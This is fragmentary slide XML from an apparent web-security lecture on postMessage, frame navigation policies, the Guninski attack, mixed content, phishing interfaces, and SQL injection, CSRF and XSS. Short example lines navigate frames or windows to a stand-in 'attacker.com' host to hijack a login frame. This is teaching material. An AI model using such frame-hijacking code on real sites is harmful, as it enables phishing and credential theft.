            <a:ext cx="7772400" cy="838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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80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frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>postMessage</a:t>
            </a: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("Attack at dawn!",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                      "http://b.com/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80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sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>window.addEventListener</a:t>
            </a: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("message", function (e) {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  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>e.origin</a:t>
            </a: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 == "http://a.com") {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    ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>e.data</a:t>
            </a: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 ... }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onsolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>}, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="10-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6096000"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"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100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Anecdote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945" name="Picture 12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964113"/>
            <a:ext cx="2616200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3" descr="b.co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0" y="4964113"/>
            <a:ext cx="2616200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947" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="5751513"/>
            <a:ext cx="25146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48" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3871913" y="5351463"/>
            <a:ext cx="1995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Attack at dawn!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990600" y="2149475"/>
            <a:ext cx="6019800" cy="5175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include “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>targetOrigin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”?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goes wrong?</a:t>
            </a:r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smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	frames[0].postMessage("Attack at dawn!");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Messages sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>When would this happen?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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EAD8062-BFDB-4E21-95A4-C8B019B16442}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="reply-attack-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389438"/>
            <a:ext cx="2971800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reply-attack-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389438"/>
            <a:ext cx="2971800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895600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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895600" y="3981450"/>
            <a:ext cx="533400" cy="190500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638800" y="1981200"/>
            <a:ext cx="533400" cy="2000250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4341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="170338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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="160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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="4286250"/>
            <a:ext cx="22764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Web Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sets up malicious site visited by victim; no control of network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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4345" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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7" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2362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8" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276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4349" name="Picture 11" descr="CompaqAlphaServerES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2228850"/>
            <a:ext cx="11557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3184525" y="2619375"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Cloud Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3981450"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -186846"/>
              <a:gd name="adj2" fmla="val 43949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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14352" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4919662" y="3748088"/>
            <a:ext cx="492125" cy="1206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3" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4256088" y="4743450"/>
            <a:ext cx="457200" cy="1714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14354" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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252913"/>
            <a:ext cx="14366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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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Navigation</a:t>
            </a:r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0962" name="Rectangle 109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21E4E98-6C54-4011-A044-49C2C5501BA0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>40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Guninski Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 3" descr="adsen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85800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8000" y="4114800"/>
            <a:ext cx="2133600" cy="1536700"/>
            <a:chOff x="4656" y="1440"/>
            <a:chExt cx="864" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41994" name="Picture 7" descr="transparen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56" y="1440"/>
              <a:ext cx="864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5" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4663" y="1440"/>
              <a:ext cx="844" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="5715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1356809" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6057900" y="3748088"/>
            <a:ext cx="1187450" cy="366712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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 12" descr="MCj034912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096000" y="4114800"/>
            <a:ext cx="164623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90600" y="5029200"/>
            <a:ext cx="5638800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open("https://attacker.com/", "awglogin");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12" descr="MCj034912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6200" y="5181600"/>
            <a:ext cx="164623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9" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="1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should the policy be?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6005A46-79CA-40A0-B97E-2AB30C506EA8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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686550" cy="5057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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="2103438"/>
            <a:ext cx="6537325" cy="4205287"/>
          </a:xfrm>
          <a:prstGeom prst="rect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5791200" y="2895600"/>
            <a:ext cx="1819275" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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5" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1362075" y="2895600"/>
            <a:ext cx="2133600" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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514475" y="4648200"/>
            <a:ext cx="1828800" cy="12954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5400000">
            <a:off x="1866900" y="4457700"/>
            <a:ext cx="1447800" cy="152400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200400" y="3657600"/>
            <a:ext cx="3429000" cy="609600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2705100" y="3238500"/>
            <a:ext cx="2514600" cy="18288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2362200" y="3124200"/>
            <a:ext cx="2667000" cy="1905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05000" y="4038600"/>
            <a:ext cx="741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Child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632325" y="3562350"/>
            <a:ext cx="930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Sibling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749675" y="4324350"/>
            <a:ext cx="1508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Descendant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10000" y="3810000"/>
            <a:ext cx="1465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BA9921"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Bust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15" name="Group 187"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/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Browser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Policy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 6 (default)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 6 (option)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Child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(no Flash)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(with Flash)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Firefox 2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Window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Safari 3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Permissive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Opera 9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Window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80" charset="-128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HTML 5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Child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066" name="Picture 62" descr="safar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47117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7" name="Picture 63" descr="i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88" y="2066925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8" name="Picture 64" descr="firef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488" y="421005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69" name="Picture 65" descr="oper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150" y="5268913"/>
            <a:ext cx="533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0" name="Picture 70" descr="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150" y="5715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1" name="Picture 71" descr="ie-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150" y="3689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500063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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" y="1310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77" name="Picture 72" descr="do-not-enter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3" y="1605"/>
              <a:ext cx="9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4073" name="Picture 130" descr="ie-6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7375" y="317817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74" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="869950" y="3852863"/>
            <a:ext cx="349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75" name="Title 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/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4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy Browser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8"/>
              </a:rPr>
              <a:t>Window Policy Anomaly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 4" descr="igoogle-befo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828800"/>
            <a:ext cx="5719763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2971800" y="2493963"/>
            <a:ext cx="5638800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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sz="1800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4825" y="2600325"/>
            <a:ext cx="5651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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[2].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="igoogle-af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828800"/>
            <a:ext cx="5724525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 autoUpdateAnimBg="0"/>
      <p:bldP spid="47110" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId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1" name="Group 4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10003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Browser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Policy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(no Flash)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IE7 (with Flash)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Firefox 3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Safari 3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Opera 9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(many policies)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80" charset="-128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         HTML 5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80" charset="-128"/>
                        </a:rPr>
                        <a:t>Descendant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8156" name="Picture 62" descr="saf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3810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7" name="Picture 64" descr="firef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488" y="3297238"/>
            <a:ext cx="5334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8" name="Picture 65" descr="ope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" y="4410075"/>
            <a:ext cx="533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59" name="Picture 70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150" y="4876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60" name="Picture 130" descr="ie-6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7375" y="218122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65150" y="2713038"/>
            <a:ext cx="654050" cy="544512"/>
            <a:chOff x="356" y="1652"/>
            <a:chExt cx="412" cy="343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48163" name="Picture 71" descr="ie-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6" y="1652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64" name="Picture 20" descr="flashjava"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect r="52881"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="548" y="1755"/>
              <a:ext cx="22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162" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/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en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adoption of Descendant Policy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User Interface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is it safe to type my password?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2531" name="Content Placeholder 4" descr="bank-of-the-west-re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524000"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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B19107E-E21C-473E-B065-BC573B971AEE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>47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362200" y="2133600"/>
            <a:ext cx="15240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14800" y="2133600"/>
            <a:ext cx="14478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705600" y="5257800"/>
            <a:ext cx="16764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3555" name="Content Placeholder 4" descr="bank-of-the-west-phis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527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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92A480F-211A-4759-A98D-636A288BC7C9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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971800" y="2133600"/>
            <a:ext cx="8382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4579" name="Content Placeholder 4" descr="bank-of-the-west-trick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527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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DBDD556-A598-42BD-A218-133BD66078AA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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971800" y="2133600"/>
            <a:ext cx="15240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72200" y="4343400"/>
            <a:ext cx="2057400" cy="10604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2133600"/>
            <a:ext cx="381000" cy="374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9" name="Picture 8" descr="vest-up-clo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2" y="2705100"/>
            <a:ext cx="8829675" cy="3238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533400" y="1524000"/>
            <a:ext cx="114300" cy="21336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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill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Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends browser request to good web site, using credentials of an innocent victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19449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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26627" name="Content Placeholder 4" descr="bank-of-the-west-pi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447800"/>
            <a:ext cx="7105650" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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A96D87A-10C6-4B2F-B5DB-DBA046A0F0DF}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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886200" y="3017838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560638" y="3017838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080125" y="5513388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2560638" y="2362200"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd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2560638" y="2362200"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln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286000" y="1957388"/>
            <a:ext cx="13716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Content:  HTTP and HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459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343400"/>
          </a:xfrm>
        </p:spPr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Page loads over HTTPS, but has HTTP content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker can control page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE:   displays mixed-content dialog to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP loaded with no warning  (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:   Flash can script the embedding page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox:   red slash over lock icon (no dialog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP do not trigger the slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safari: does not detect mixed content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6330" y="6048345"/>
            <a:ext cx="1604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Still current?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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1400840" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="33594" t="37500" r="32813" b="40625"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1752600"/>
            <a:ext cx="3276600" cy="1600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14400" y="4038600"/>
            <a:ext cx="7239000" cy="2133600"/>
            <a:chOff x="576" y="1152"/>
            <a:chExt cx="4560" cy="1344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400836" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\origin-contamination.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect t="55110"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="1152"/>
              <a:ext cx="4560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00841" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3497" y="1440"/>
              <a:ext cx="336" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300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0842" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1451"/>
              <a:ext cx="428" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300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30788" y="1611313"/>
            <a:ext cx="3395662" cy="1741487"/>
            <a:chOff x="3169" y="916"/>
